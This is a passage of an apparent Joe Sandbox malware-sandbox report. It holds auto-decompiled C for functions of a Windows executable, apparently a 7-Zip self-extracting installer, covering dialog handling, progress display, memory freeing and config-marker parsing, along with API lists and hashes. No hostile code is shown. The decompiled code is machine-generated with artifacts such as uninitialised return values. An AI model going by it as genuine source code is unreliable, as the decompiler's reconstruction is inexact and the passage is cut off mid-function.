ReleaseDC.USER32 ref: 00408250

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: Window$MetricsProcSystem$CallDrawIconLongParentRectRelease
String ID:
API String ID: 2586545124-0
Opcode ID: 83057c79f2c88d391f1805632dc92285a4e3022d2fadc16537eed77f9a906b47
Instruction ID: f279ad638593bb0c02c28414326814beda2d9d37ba4553b1ab7b6853af478c25
Opcode Fuzzy Hash: 83057c79f2c88d391f1805632dc92285a4e3022d2fadc16537eed77f9a906b47
Instruction Fuzzy Hash: 08310A7650120ABFDB019FB8DE48EEF3B69FB08351F008525FA11E6291CB75D920DB65

Uniqueness

Uniqueness Score: -1.00%

Function 004156A7, Relevance: 16.5, APIs: 11, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E004156A7(void* __ecx) {
				void* _t12;

				_push( *((intOrPtr*)(__ecx + 0x4c)));
				L004191B0();
				_push( *((intOrPtr*)(__ecx + 0x3c)));
				L004191B0();
				_push( *((intOrPtr*)(__ecx + 0x38)));
				L004191B0();
				_push( *((intOrPtr*)(__ecx + 0x34)));
				L004191B0();
				_push( *((intOrPtr*)(__ecx + 0x30)));
				L004191B0();
				_push( *((intOrPtr*)(__ecx + 0x2c)));
				L004191B0();
				_push( *((intOrPtr*)(__ecx + 0x28)));
				L004191B0();
				_push( *((intOrPtr*)(__ecx + 0x24)));
				L004191B0();
				_push( *((intOrPtr*)(__ecx + 0x18)));
				L004191B0();
				_push( *((intOrPtr*)(__ecx + 0xc)));
				L004191B0();
				_push( *((intOrPtr*)(__ecx + 8)));
				L004191B0();
				return _t12;
			}

0x004156aa
0x004156ad
0x004156b2
0x004156b5
0x004156ba
0x004156bd
0x004156c2
0x004156c5
0x004156ca
0x004156cd
0x004156d2
0x004156d5
0x004156da
0x004156dd
0x004156e2
0x004156e5
0x004156ea
0x004156ed
0x004156f2
0x004156f5
0x004156fa
0x004156fd
0x00415706

APIs

??3@YAXPAX@Z.MSVCRT ref: 004156AD
??3@YAXPAX@Z.MSVCRT ref: 004156B5
??3@YAXPAX@Z.MSVCRT ref: 004156BD
??3@YAXPAX@Z.MSVCRT ref: 004156C5
??3@YAXPAX@Z.MSVCRT ref: 004156CD
??3@YAXPAX@Z.MSVCRT ref: 004156D5
??3@YAXPAX@Z.MSVCRT ref: 004156DD
??3@YAXPAX@Z.MSVCRT ref: 004156E5
??3@YAXPAX@Z.MSVCRT ref: 004156ED
??3@YAXPAX@Z.MSVCRT ref: 004156F5
??3@YAXPAX@Z.MSVCRT ref: 004156FD

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: b95c2f54f42df379709473a9b97638e1ea7083fb856c4dc08ffcd234219093be
Instruction ID: 89fa2ea9e7dfd86616dbeeb867654c6fb378e0e89a7fbb9e23d32919dde88c48
Opcode Fuzzy Hash: b95c2f54f42df379709473a9b97638e1ea7083fb856c4dc08ffcd234219093be
Instruction Fuzzy Hash: 66F0EE314115127EEB623B23DD1B9867AB3BF04718358552EF84710C3ADB567CE1DA4C

Uniqueness

Uniqueness Score: -1.00%

Function 004095CA, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 73
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004095CA(void* __ecx, void* __edx, void* __eflags) {
				long _v8;
				intOrPtr _v12;
				int _v20;
				int _v24;
				intOrPtr _v32;
				char _v40;
				void* _t44;

				_t44 = __ecx;
				E00409278(__ecx, __edx, __eflags);
				E00407ABB(_t44, 0x4b7, 0);
				E00407A29(_t44, 0x4b7,  &_v40);
				E00407A29(_t44, 0x4b7,  &_v24);
				DestroyWindow(GetDlgItem( *(_t44 + 4), 0x4b7));
				CreateWindowExA(0x200, "Edit", 0x41ae2a, 0x500100a0, _v24, _v20, _v32 - _v24, _v12 - _v20,  *(_t44 + 4), 0x4b7, 0, 0);
				_v8 = SendMessageW( *(_t44 + 4), 0x31, 0, 0);
				SendMessageW(GetDlgItem( *(_t44 + 4), 0x4b7), 0x30, _v8, 1);
				SetFocus(GetDlgItem( *(_t44 + 4), 0x4b6));
				return 0;
			}

0x004095d3
0x004095d5
0x004095e4
0x004095f0
0x004095fd
0x0040960f
0x00409645
0x0040965f
0x0040966c
0x00409679
0x00409685

APIs

Part of subcall function 00409278: memset.MSVCRT ref: 004092CA
Part of subcall function 00409278: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004092DE
Part of subcall function 00409278: SHGetFileInfoW.SHELL32(?,00000000,00000000,000002B4,00000103), ref: 004092FE
Part of subcall function 00409278: GetDlgItem.USER32 ref: 00409311
Part of subcall function 00409278: SetWindowLongW.USER32 ref: 0040931F

Part of subcall function 00407ABB: GetDlgItem.USER32 ref: 00407AC8
Part of subcall function 00407ABB: ShowWindow.USER32(00000000,?), ref: 00407ADF

Part of subcall function 00407A29: GetDlgItem.USER32 ref: 00407A31

GetDlgItem.USER32 ref: 0040960C
DestroyWindow.USER32(00000000), ref: 0040960F
CreateWindowExA.USER32 ref: 00409645
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00409655
GetDlgItem.USER32 ref: 00409662
SendMessageW.USER32(00000000,00000030,?,00000001), ref: 0040966C
GetDlgItem.USER32 ref: 00409676
SetFocus.USER32(00000000), ref: 00409679

Strings

Edit, xrefs: 0040963B

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: Item$Window$MessageSend$CreateDestroyDirectoryFileFocusInfoLongShowSystemmemset
String ID: Edit
API String ID: 1904772019-554135844
Opcode ID: 0be7facc3e4f8ba872de67d6a079024a8f22cb4c18f1c79b82132ec26fa154f1
Instruction ID: 8a86f020cb998119f4c04dc0e8788b762e1a6262d45705b8329d94c27ff92963
Opcode Fuzzy Hash: 0be7facc3e4f8ba872de67d6a079024a8f22cb4c18f1c79b82132ec26fa154f1
Instruction Fuzzy Hash: EB115171A40208BBDB119BE5CD49FAFBBBDEF89B04F10442AF611F6190C675AD108B29

Uniqueness

Uniqueness Score: -1.00%

Function 0040985F, Relevance: 15.1, APIs: 10, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040985F(void* __ecx, void* __edx, void* __eflags) {
				struct HWND__* _v8;
				intOrPtr _v12;
				struct tagPOINT _v20;
				struct tagRECT _v36;
				struct HWND__* _t55;
				void* _t71;

				_t71 = __ecx;
				_v12 = E00408F3F(__edx);
				E00407ABB(__ecx, 0x4b3, 0);
				E00407ABB(__ecx, 0x4b4, 0);
				E00407A29(__ecx, 0x4b3,  &_v36);
				_v20.x = _v36.left;
				_v20.y = _v36.top;
				ClientToScreen( *(_t71 + 4),  &_v20);
				GetWindowRect( *(_t71 + 4),  &_v36);
				SetWindowPos( *(_t71 + 4), 0, 0, 0, _v36.right - _v36.left, _v20.y - _v36.top, 6);
				SetWindowLongW( *(_t71 + 4), 0xfffffff0, 0x800000);
				SetWindowLongW( *(_t71 + 4), 0xffffffec, 8);
				GetWindowRect( *(_t71 + 4),  &_v36);
				E00407BA4(_t71, 0x4b2, 0, 0, _v36.right - _v36.left, _v36.bottom - _v36.top, 4);
				_v8 = GetDlgItem( *(_t71 + 4), 0x4b2);
				_t55 = GetDlgItem( *(_t71 + 4), 0x4b2);
				SetWindowLongW(_t55, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) | 0x10000201);
				return _v12;
			}

0x00409868
0x0040987a
0x0040987d
0x0040988a
0x00409896
0x0040989e
0x004098a4
0x004098ae
0x004098c1
0x004098d9
0x004098ef
0x004098f8
0x00409901
0x0040991f
0x00409932
0x00409935
0x00409951
0x0040995a

APIs

Part of subcall function 00408F3F: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040932F), ref: 00408F69
Part of subcall function 00408F3F: LoadIconW.USER32(00000000), ref: 00408F6C
Part of subcall function 00408F3F: GetSystemMetrics.USER32 ref: 00408F80
Part of subcall function 00408F3F: GetSystemMetrics.USER32 ref: 00408F85
Part of subcall function 00408F3F: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040932F), ref: 00408F8E
Part of subcall function 00408F3F: LoadImageW.USER32 ref: 00408F91
Part of subcall function 00408F3F: SendMessageW.USER32(?,00000080,00000001,?), ref: 00408FB1
Part of subcall function 00408F3F: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408FBA
Part of subcall function 00408F3F: GetDlgItem.USER32 ref: 00408FD7
Part of subcall function 00408F3F: GetDlgItem.USER32 ref: 00408FE1
Part of subcall function 00408F3F: GetWindowLongW.USER32(?,000000F0), ref: 00408FED
Part of subcall function 00408F3F: SetWindowLongW.USER32 ref: 00408FFC
Part of subcall function 00408F3F: GetDlgItem.USER32 ref: 0040900A
Part of subcall function 00408F3F: GetDlgItem.USER32 ref: 00409018
Part of subcall function 00408F3F: GetWindowLongW.USER32(000000F0,000000F0), ref: 00409024
Part of subcall function 00408F3F: SetWindowLongW.USER32 ref: 00409033
Part of subcall function 00408F3F: GetDlgItem.USER32 ref: 00409040

Part of subcall function 00407ABB: GetDlgItem.USER32 ref: 00407AC8
Part of subcall function 00407ABB: ShowWindow.USER32(00000000,?), ref: 00407ADF

Part of subcall function 00407A29: GetDlgItem.USER32 ref: 00407A31

ClientToScreen.USER32(?,?), ref: 004098AE
GetWindowRect.USER32 ref: 004098C1
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000006), ref: 004098D9
SetWindowLongW.USER32 ref: 004098EF
SetWindowLongW.USER32 ref: 004098F8
GetWindowRect.USER32 ref: 00409901

Part of subcall function 00407BA4: GetDlgItem.USER32 ref: 00407BC2
Part of subcall function 00407BA4: SetWindowPos.USER32(00000000), ref: 00407BC9

GetDlgItem.USER32 ref: 00409928
GetDlgItem.USER32 ref: 00409935
GetWindowLongW.USER32(?,000000F0), ref: 00409942
SetWindowLongW.USER32 ref: 00409951

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: Window$Item$Long$HandleLoadMessageMetricsModuleRectSendSystem$ClientIconImageScreenShow
String ID:
API String ID: 1121484998-0
Opcode ID: 896a1083596387c429694cdeec32fa87b02d5184d92bc3279f9fd5c98c9e356b
Instruction ID: 9fdbf200746135bab5730a4dafb3ad07ec8a2d1c31f6c6808a3a3c7848768d2e
Opcode Fuzzy Hash: 896a1083596387c429694cdeec32fa87b02d5184d92bc3279f9fd5c98c9e356b
Instruction Fuzzy Hash: 45310171A00219BFDB11DBA9CD45EAFBBBDFF48710F104129F525F22A1CB74A9108B69

Uniqueness

Uniqueness Score: -1.00%

Function 00409AB1, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00409AB1(intOrPtr* __eax, void* __edx, void* __eflags) {
				signed int _v8;
				char _v20;
				char _v32;
				char _v44;
				char _v56;
				signed int _t34;
				intOrPtr _t37;
				void* _t50;
				signed int _t57;
				signed int _t58;
				short* _t61;
				void* _t82;
				void* _t83;
				intOrPtr* _t84;
				void* _t86;

				_t84 = __eax;
				E00411C48(__eax, 0x41e844);
				_t34 = E004099F4(0x41c004, _t84);
				_v8 = _t34;
				if(_t34 <= 0) {
					L8:
					return _t34 | 0xffffffff;
				}
				_t61 =  *_t84 + _t34 * 2;
				if( *_t61 != 0x2e) {
					goto L8;
				}
				 *(_t84 + 4) = _t34;
				 *_t61 = 0;
				_t37 =  *0x41e76c; // 0x0
				_push(_t84);
				if(_t37 == 1) {
					_t57 = E004099F4(0x41c004);
					if(_t57 < 0) {
						L17:
						return 1;
					}
					_t82 = _t57 + _t57;
					_t44 =  *_t84 + _t82;
					if( *((short*)( *_t84 + _t82)) != 0x2e || _v8 - _t57 != 4) {
						goto L17;
					} else {
						E004119E1( &_v56, 2, _t44 + 2);
						E00411B84( &_v32, _v56);
						_push(_v56);
						L004191B0();
						if(E0040995B( &_v32, 0x41bffc) == 0) {
							_push(_v32);
							L004191B0();
							goto L17;
						}
						 *(_t84 + 4) = _t57;
						 *((short*)(_t82 +  *_t84)) = 0;
						_t50 = _t82 +  *_t84 + 2;
						__imp___wtol(_t50);
						_push(_v32);
						L15:
						_t86 = _t50;
						L004191B0();
						_t29 = _t86 + 1; // 0x1
						return _t29;
					}
				}
				_t34 = E004099F4(0x41c004);
				_t58 = _t34;
				if(_t58 <= 0) {
					goto L8;
				}
				_t83 = _t58 + _t58;
				_t34 =  *_t84 + _t83;
				if( *_t34 != 0x2e) {
					goto L8;
				}
				E004119E1( &_v44, 2, _t34 + 2);
				E00411B84( &_v20, _v44);
				_push(_v44);
				L004191B0();
				_t34 = E0040995B( &_v20, 0x41bffc);
				if(_t34 == 0) {
					_push(_v20);
					L004191B0();
					goto L8;
				}
				 *(_t84 + 4) = _t58;
				 *((short*)(_t83 +  *_t84)) = 0;
				_t50 = _t83 +  *_t84 + 2;
				__imp___wtol(_t50);
				_push(_v20);
				goto L15;
			}

0x00409aba
0x00409ac3
0x00409ad0
0x00409ad5
0x00409ada
0x00409b76
0x00000000
0x00409b76
0x00409ae2
0x00409ae9
0x00000000
0x00000000
0x00409aef
0x00409af4
0x00409af7
0x00409afd
0x00409b00
0x00409b83
0x00409b87
0x00409c08
0x00000000
0x00409c0a
0x00409b8b
0x00409b8e
0x00409b94
0x00000000
0x00409ba0
0x00409ba9
0x00409bb4
0x00409bb9
0x00409bbc
0x00409bd1
0x00409bff
0x00409c02
0x00000000
0x00409c07
0x00409bd5
0x00409bda
0x00409be0
0x00409be5
0x00409beb
0x00409bee
0x00409bee
0x00409bf0
0x00409bf7
0x00000000
0x00409bf7
0x00409b94
0x00409b02
0x00409b07
0x00409b0b
0x00000000
0x00000000
0x00409b0f
0x00409b12
0x00409b18
0x00000000
0x00000000
0x00409b23
0x00409b2e
0x00409b33
0x00409b36
0x00409b44
0x00409b4b
0x00409b6d
0x00409b70
0x00000000
0x00409b75
0x00409b4f
0x00409b54
0x00409b5a
0x00409b5f
0x00409b65
0x00000000

APIs

Part of subcall function 00411C48: ??2@YAPAXI@Z.MSVCRT ref: 00411C70
Part of subcall function 00411C48: ??3@YAXPAX@Z.MSVCRT ref: 00411C79
Part of subcall function 00411C48: memcpy.MSVCRT ref: 00411C93

??3@YAXPAX@Z.MSVCRT ref: 00409B36
_wtol.MSVCRT(?,?,00000002,-00000002,?,?,0041E844,00000000), ref: 00409B5F
??3@YAXPAX@Z.MSVCRT ref: 00409B70
??3@YAXPAX@Z.MSVCRT ref: 00409BBC
_wtol.MSVCRT(?,?,00000002,-00000002,?,?,0041E844,00000000), ref: 00409BE5
??3@YAXPAX@Z.MSVCRT ref: 00409BF0
??3@YAXPAX@Z.MSVCRT ref: 00409C02

Part of subcall function 004119E1: memcpy.MSVCRT ref: 00411A0F

Part of subcall function 00411B84: memcpy.MSVCRT ref: 00411BAA

Strings

.\/, xrefs: 00409AC8

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ??3@$memcpy$_wtol$??2@
String ID: .\/
API String ID: 211236615-1884134905
Opcode ID: 99e9612978a03b7b9cc33154d1e6ca788a3612bce54da366c8f2b9a248262d29
Instruction ID: 0b6a9690c019190aaa6ec8925b5ba1fe496bdf8c1da3795196df282918bb7362
Opcode Fuzzy Hash: 99e9612978a03b7b9cc33154d1e6ca788a3612bce54da366c8f2b9a248262d29
Instruction Fuzzy Hash: 1C41A331A04106ABCB15EF69DC919EEB7B5FF14318B14843EE512B72E2EB78AC41C748

Uniqueness

Uniqueness Score: -1.00%

Function 00404048, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00404048(intOrPtr __ecx, char* __edx, intOrPtr _a4, intOrPtr _a8) {
				char* _v8;
				intOrPtr _v12;
				char _v24;
				char _v124;
				char* _t41;
				void* _t68;

				_t67 = _a4;
				_v12 = __ecx;
				_v8 = __edx;
				E004117A8(_a4, ";!@Install@!UTF-8!");
				_t66 = _a8;
				E004117A8(_a8, ";!@InstallEnd@!");
				E0041170C( &_v24,  *((intOrPtr*)(_t67 + 4)) - 1, _t67);
				E004117A8(_t67, _v24);
				_push(_v24);
				L004191B0();
				E0041170C( &_v24,  *((intOrPtr*)(_t66 + 4)) - 1, _t66);
				E004117A8(_t66, _v24);
				_push(_v24);
				L004191B0();
				if(_v8 != 0) {
					_t41 = _v8;
					if( *_t41 != 0) {
						wsprintfA( &_v124, ":%hs", _t41);
						_t68 = _t68 + 0xc;
						E00411846(_t67,  &_v124);
						E00411846(_t66,  &_v124);
					}
				}
				if(_v12 != 0) {
					wsprintfA( &_v124, ":Language:%u", _v12);
					E00411846(_t67,  &_v124);
					E00411846(_t66,  &_v124);
				}
				_t49 = "!";
				E00411846(_t67, "!");
				return E00411846(_t66, _t49);
			}

0x00404050
0x00404054
0x0040405e
0x00404061
0x00404066
0x00404070
0x0040407e
0x00404088
0x0040408d
0x00404090
0x0040409f
0x004040a9
0x004040ae
0x004040b1
0x004040c1
0x004040c3
0x004040c9
0x004040d5
0x004040d7
0x004040e0
0x004040eb
0x004040eb
0x004040c9
0x004040f4
0x00404102
0x0040410d
0x00404118
0x00404118
0x0040411d
0x00404125
0x00404136

APIs

Part of subcall function 004117A8: ??2@YAPAXI@Z.MSVCRT ref: 004117CA
Part of subcall function 004117A8: ??3@YAXPAX@Z.MSVCRT ref: 004117D4

Part of subcall function 0041170C: memcpy.MSVCRT ref: 0041172D

??3@YAXPAX@Z.MSVCRT ref: 00404090
??3@YAXPAX@Z.MSVCRT ref: 004040B1
wsprintfA.USER32 ref: 004040D5
wsprintfA.USER32 ref: 00404102

Strings

;!@InstallEnd@!, xrefs: 00404069
:%hs, xrefs: 004040CF
:Language:%u, xrefs: 004040FC
;!@Install@!UTF-8!, xrefs: 00404057

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ??3@$wsprintf$??2@memcpy
String ID: :%hs$:Language:%u$;!@Install@!UTF-8!$;!@InstallEnd@!
API String ID: 1376779256-695273242
Opcode ID: c8f8111b7421c4f5469c19c34ddd9f84d76b7a4cb28d77ac7facfbb57728b8b2
Instruction ID: f21a7fe07a8f386c91366acc762034fd49372255a28dee344885964aedd3aa00
Opcode Fuzzy Hash: c8f8111b7421c4f5469c19c34ddd9f84d76b7a4cb28d77ac7facfbb57728b8b2
Instruction Fuzzy Hash: 83218775A00109ABDB05F7A5D882AFE77BE9F44305F24402BF601B3292CF385E8497A9

Uniqueness

Uniqueness Score: -1.00%

Function 00407894, Relevance: 13.5, APIs: 9, Instructions: 47
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407894(void* __ecx, int _a4) {
				void* _t21;

				_t21 = __ecx;
				SendMessageW(GetDlgItem( *(__ecx + 4), 0x4b3), 0xf4, 0, 1);
				SendMessageW(GetDlgItem( *(_t21 + 4), 0x4b4), 0xf4, 0, 1);
				SendMessageW( *(_t21 + 4), 0x401, _a4, 0);
				SendMessageW(GetDlgItem( *(_t21 + 4), _a4), 0xf4, 1, 1);
				return SetFocus(GetDlgItem( *(_t21 + 4), _a4));
			}

0x0040789e
0x004078bb
0x004078cd
0x004078dd
0x004078ee
0x00407904

APIs

GetDlgItem.USER32 ref: 004078A8
SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004078BB
GetDlgItem.USER32 ref: 004078C5
SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004078CD
SendMessageW.USER32(?,00000401,00000000,00000000), ref: 004078DD
GetDlgItem.USER32 ref: 004078E6
SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 004078EE
GetDlgItem.USER32 ref: 004078F7
SetFocus.USER32(00000000,?,?,00000000,0040851A,000004B3,00000000,?,000004B3), ref: 004078FA

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ItemMessageSend$Focus
String ID:
API String ID: 3946207451-0
Opcode ID: 6496da3c9c0f305d28eaa89951ba916d2429e6ba680465666632d837b6b77d3e
Instruction ID: 223abb1aad09d6feda2c47f27d25d20709fdb3fcd92210378734137cee04cabe
Opcode Fuzzy Hash: 6496da3c9c0f305d28eaa89951ba916d2429e6ba680465666632d837b6b77d3e
Instruction Fuzzy Hash: 37F04F712403087BEA212B61DD86F5BBB5EEF85B54F018425F750650F0CBB7EC209A29

Uniqueness

Uniqueness Score: -1.00%

Function 00408946, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 111
windowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00408946(void* __ecx, void* __edx, void* __eflags, signed int _a4) {
				char _v16;
				short _v40;
				void* _t47;
				signed char _t58;
				intOrPtr* _t59;
				intOrPtr* _t61;
				void* _t88;
				intOrPtr* _t90;
				void* _t91;

				_t88 = __edx;
				_t91 = __ecx;
				E00411B60(_t47,  &_v16);
				_t90 = _a4;
				if(( *(__ecx + 0x60) |  *(__ecx + 0x64)) == 0) {
					_t9 =  &_a4;
					 *_t9 = _a4 & 0x00000000;
					__eflags =  *_t9;
				} else {
					_a4 = E00419250(E00419300( *_t90,  *((intOrPtr*)(_t90 + 4)), 0x7530, 0), _t88,  *((intOrPtr*)(_t91 + 0x60)),  *((intOrPtr*)(_t91 + 0x64)));
				}
				if(_a4 > 0x7530) {
					_a4 = 0x7530;
				}
				SendMessageW(GetDlgItem( *(_t91 + 4), 0x4b8), 0x402, _a4, 0);
				asm("cdq");
				wsprintfW( &_v40, L"%d%%", (_a4 + 0x12b) / 0x12c);
				if(( *0x41e44c & 0x00000004) != 0) {
					E00407A0F(GetDlgItem( *(_t91 + 4), 0x4b5),  &_v40);
				}
				_t58 =  *0x41e44c; // 0x0
				if((_t58 & 0x00000002) == 0) {
					_t99 = _t58 & 0x00000001;
					if((_t58 & 0x00000001) == 0) {
						E00411BE5( &_v16,  &_v40);
						E004015EC( &_v16, 0x20);
						_push( *0x41e73c);
					} else {
						E00411BE5( &_v16,  *0x41e73c);
						E004015EC( &_v16, 0x20);
						_push( &_v40);
					}
					E00411CA3( &_v16);
					_t58 = E00408056(_t91, _t99, _v16);
				}
				if( *((intOrPtr*)(_t91 + 0x70)) != 0) {
					_t59 =  *((intOrPtr*)(_t91 + 0x70));
					 *((intOrPtr*)( *_t59 + 0x28))(_t59,  *(_t91 + 4), 2);
					_t61 =  *((intOrPtr*)(_t91 + 0x70));
					_t58 =  *((intOrPtr*)( *_t61 + 0x24))(_t61,  *(_t91 + 4),  *_t90,  *((intOrPtr*)(_t90 + 4)),  *((intOrPtr*)(_t91 + 0x60)),  *((intOrPtr*)(_t91 + 0x64)));
				}
				_push(_v16);
				L004191B0();
				return _t58;
			}

0x00408946
0x0040894e
0x00408954
0x0040895f
0x00408967
0x00408988
0x00408988
0x00408988
0x00408969
0x00408983
0x00408983
0x0040898f
0x00408991
0x00408991
0x004089af
0x004089bd
0x004089cf
0x004089df
0x004089f2
0x004089f2
0x004089f7
0x004089fe
0x00408a03
0x00408a05
0x00408a26
0x00408a30
0x00408a35
0x00408a07
0x00408a0d
0x00408a17
0x00408a1f
0x00408a1f
0x00408a3e
0x00408a48
0x00408a48
0x00408a51
0x00408a53
0x00408a5e
0x00408a64
0x00408a75
0x00408a75
0x00408a78
0x00408a7b
0x00408a85

APIs

Part of subcall function 00411B60: ??2@YAPAXI@Z.MSVCRT ref: 00411B68

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040897E

Part of subcall function 00411BE5: ??2@YAPAXI@Z.MSVCRT ref: 00411C17
Part of subcall function 00411BE5: ??3@YAXPAX@Z.MSVCRT ref: 00411C20
Part of subcall function 00411BE5: memcpy.MSVCRT ref: 00411C38

GetDlgItem.USER32 ref: 004089A2
SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 004089AF
wsprintfW.USER32 ref: 004089CF
GetDlgItem.USER32 ref: 004089ED
??3@YAXPAX@Z.MSVCRT ref: 00408A7B

Strings

%d%%, xrefs: 004089C9

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ??2@??3@Item$MessageSendUnothrow_t@std@@@__ehfuncinfo$??2@memcpywsprintf
String ID: %d%%
API String ID: 3036602612-1518462796
Opcode ID: 78bbb3e831907e591ee398b5dbdb869b2610e4328640572f2c36b6117cf16983
Instruction ID: 897cffd7501da61c07280fb0c04fd43b1710295bd97e9baaaef8b47ade3b7e37
Opcode Fuzzy Hash: 78bbb3e831907e591ee398b5dbdb869b2610e4328640572f2c36b6117cf16983
Instruction Fuzzy Hash: 8341A375900704BFDB15ABA1CD45EDAB7B9FF08304F10842EFA42662E1DB39E950CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00409DFD, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00409DFD(void* __ecx, void* __edx, void* __eflags) {
				intOrPtr* _t44;
				void* _t46;
				intOrPtr* _t48;
				void* _t49;
				void* _t52;
				WCHAR* _t71;
				intOrPtr _t74;
				void* _t77;
				void* _t79;
				void* _t80;
				void* _t82;

				_t82 = __eflags;
				_t77 = _t79 - 0x78;
				_t80 = _t79 - 0x88;
				_t52 = __ecx;
				 *((intOrPtr*)(_t77 + 0x3c)) = 0;
				 *((intOrPtr*)(_t77 + 0x44)) = 0;
				 *((intOrPtr*)(_t77 + 0x48)) = 0;
				 *((intOrPtr*)(_t77 + 0x4c)) = 0;
				 *((intOrPtr*)(_t77 + 0x50)) = 0;
				 *((intOrPtr*)(_t77 + 0x54)) = 0;
				 *((intOrPtr*)(_t77 + 0x58)) = 0;
				E00411B60(0, _t77 + 0x5c);
				_t74 = E00409AB1(_t77 + 0x5c, __edx, _t82);
				if(_t74 != 0xffffffff) {
					 *((intOrPtr*)(_t77 + 0x74)) = _t74;
					E00411B60(_t36, _t77 + 0x68);
